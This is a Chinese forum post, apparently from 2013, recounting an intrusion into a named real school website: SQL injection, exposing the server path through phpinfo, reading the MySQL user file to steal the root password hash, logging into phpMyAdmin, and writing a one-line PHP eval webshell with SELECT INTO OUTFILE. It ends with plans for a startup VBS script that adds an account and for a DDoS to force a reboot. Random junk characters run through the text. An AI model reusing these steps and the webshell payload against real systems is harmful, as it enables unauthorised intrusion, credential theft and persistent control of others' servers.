第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏$ W& p. a. p, s
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!* m; V" D$ }' B
- u% F5 b1 Y L0 A- K6 Y/ c
0 J5 g/ B. X: p6 Q+ E* R
0 D3 J. S' l! ?2 i( V& P常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
- u1 ^9 A5 K) z0 S+ W/ f0 |8 Y5 R) r/ |6 L0 j$ j
那么想可以直接写入shell ,getshell有几个条件:
' ]( _' [! M5 h, t1 k; t1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 8 `4 C9 s' _; `2 b
/ T6 A& X' @7 w* T: s" M" _
试着爆绝对路径:
, v) d V! D% Q! k- L/ |" p1./phpMyAdmin/index.php?lang[]=1 # ~, Z h4 X+ h" b
2./phpMyAdmin/phpinfo.php
( l0 J- f1 g' a- ~. u6 o3./load_file() . {* Q2 O. o* e9 y z; {) Z4 M
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
8 ^3 q s8 q$ l# b5./phpmyadmin/libraries/select_lang.lib.php O8 C" c* }6 C$ G: B
6./phpmyadmin/libraries/lect_lang.lib.php & o. B, s$ k9 I
7./phpmyadmin/libraries/mcrypt.lib.php
( x6 [; s5 ]& X* _# {8./phpmyadmin/libraries/export/xls.php ! ]4 L! V5 }7 g2 E
$ M' p9 c. n; K5 Q$ m9 ?% \均不行........................... & N7 i3 I% [( h T
* y6 [% e( ~6 i* b御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php % m3 e) }8 p: y
3 e% D8 z: [+ |. f6 }
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin ' y3 ]! y6 {8 s/ J( `9 N
1 T0 J) f8 `& D& Q
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
1 J8 \- e0 o* L# Y9 t: i' P9 j7 N! v, Y! Y
敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
! {9 B, z" ?! q5 A) F0 O% Z, y w1 ?+ l. z
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell & ^2 m) i$ t) f- i' s. ?0 y, W8 }& @; ?
5 Q6 J5 ~8 x- i- g* e Khttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
$ D5 s+ }' H, v2 @ p) `1 u' `1 m1 K1 s8 ~
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD " D- B0 h. Z1 E
/ M, X4 E6 C, ?7 r+ d
成功读到root密码: 7 h: R! `" X) X! A9 B# O) p
2 q% `. q6 I. ~3 g17---- r(0072)
9 G5 p) N# G& B9 e18---- o(006f) : a. s4 P* `% g
19---- o(006f)
& r0 _' z9 K0 ? W: H4 d20---- t(0074)
: ]+ ?/ C8 s6 A& ~9 p21---- *(002a) ' Y+ z, v0 x' W
22---- 8(0038) ! X+ N7 g" ?+ k+ r' s& R$ }0 a' V
23---- 2(0032) / {6 L& T: ~; z. N
24---- E(0045)
3 z$ E$ l3 n+ {( @# Z7 H$ K! g25---- 1(0031)
1 n% |$ W8 J+ O/ k( }26---- C(0043)
/ ?% j: H( Q& j3 H( C27---- 5(0035) 8 x- x* o( a+ }! f& W' e
28---- 8(0038) ' ^6 H+ V( F8 x0 X( b
29---- 2(0032) 3 d) I5 V* p4 d& ?3 v; y, A% P
30---- 8(0038) ; _) @& `4 U) {( ]* l
31---- A(0041)
7 n0 A( I% B. [$ S4 G1 q J+ [8 r32---- 9(0039)
0 F9 @. i0 p0 [33---- B(0042)
- D# t1 T, J$ b2 U( Q9 N: c# C7 C34---- 5(0035)
0 E" B8 h4 x+ ~9 [" @& Q35---- 4(0034)
5 v l2 [4 Y. {! B36---- 8(0038)
) a0 a) p5 y3 n7 Y4 d- V37---- 6(0036)
" ?9 Y; p9 L/ r0 l38---- 4(0034)
" P9 l0 P+ d/ k4 P& s39---- 9(0039) 2 `1 B! J) K5 D; B
40---- 1(0031) 4 M* \& U3 W; n9 E; k" t
41---- 1(0031) 5 Y/ e9 i1 b1 N/ w# `+ M3 F
42---- 5(0035)
; l( W- c' j1 C1 {) A' A43---- 3(0033) + {; F9 ^% {9 Y, H4 T
44---- 5(0035)
8 P7 b2 E% _7 X z) g- ]45---- 9(0039) ( J3 b0 ^6 }! H
46---- 8(0038)
3 W W" V9 i% C) \, [ t47---- F(0046) 0 }" q8 O: b) H) D) _
48---- F(0046)
: e/ d! `/ I, [% f. ~7 d/ h+ p49---- 4(0034)
+ p' b7 c5 r9 s3 f& o" h50---- F(0046)
- J( P$ S: a8 w9 b1 ?' {% I51---- 0(0030)
3 r& B" u" _, y( H* x( C1 n. F52---- 3(0033) 7 K# G3 j' V7 x! V, l3 t1 e' X! A
53---- 2(0032) $ S! W# Z% ~" z
54---- A(0041) 4 V7 |1 \( T2 | u4 A5 o) x
55---- 4(0034)
( Q/ s7 k! L6 f0 ?5 F56---- A(0041) ! T d5 y7 c7 ]4 A
57---- B(0042)
- b( x: \/ K' M# ?1 Y/ R3 J58---- *(0044) . [5 q7 y: J. r7 I; U9 I9 ~- z
59---- *(0035) + n9 e: W) A: M. Y& F: o' L
60---- *(0041) % z& m5 Z7 i9 |# `
61---- *0032) 9 B% h h" S" L0 z7 i& ^, }
- H4 E$ @7 [/ F6 R' o$ x: L解密后成功登陆phpmyamin
2 l. [2 \: O4 W2 n7 e' J) u
' i1 e3 d/ b% ]7 l; }6 K$ Y) I
( X5 r [* `% T( F1 `# I
3 ~+ R7 ^- T3 p+ M0 D) I/ d
" Q+ Q9 J/ i; H: i& R: n8 T$ n/ k1 A找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
$ G5 @( l1 U' N3 A' J
5 U2 I" S' j0 h( f8 V7 O1 W/ F* i c成功执行,拿下shell,菜刀连接: ' B* d9 {# J9 i
8 H8 W( @ P( t% @ s- @/ j+ L服务器不支持asp,aspx,php提权无果................... 2 w9 O8 \4 ]2 m5 B
* ?) h% X: m5 z; R) K$ r但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: G p% c4 _# K3 e' y
服务器上已经有个隐藏帐号了 % G, K- d E p3 Q- Y
别名 administrators! X/ F/ b7 x2 E9 j' v8 X- A0 `) d5 H
注释 管理员对计算机/域有不受限制的完全访问权
, c7 h' L1 J P( C! j成员
, M1 M1 f7 V& _5 @1 D6 g-------------------------------------------------------------------------------
! D. r* {+ T) G3 wadmin4 b2 r7 D. {6 U5 S' |4 v( c
Administrator
" X/ T& D" W+ A& k6 W. ]slipper$# f3 o& X: j% z7 h
sqluser: V- q5 E, f- D& c! u
命令成功完成。
3 d( l+ |4 M* j2 q J B8 g: N( s4 ~8 {( S
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
, \0 D6 a* C& }" N) Q3 Z- d! H
" ` w% s- d2 J1 k) dddos服务器重启,不然就只能坐等服务器重启了...............................
. l* |2 A }8 g: i s; X) }, f% p7 e7 ]: R4 r" B
* H7 w* a: l. W% B/ r1 ^4 V* m+ t- s
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
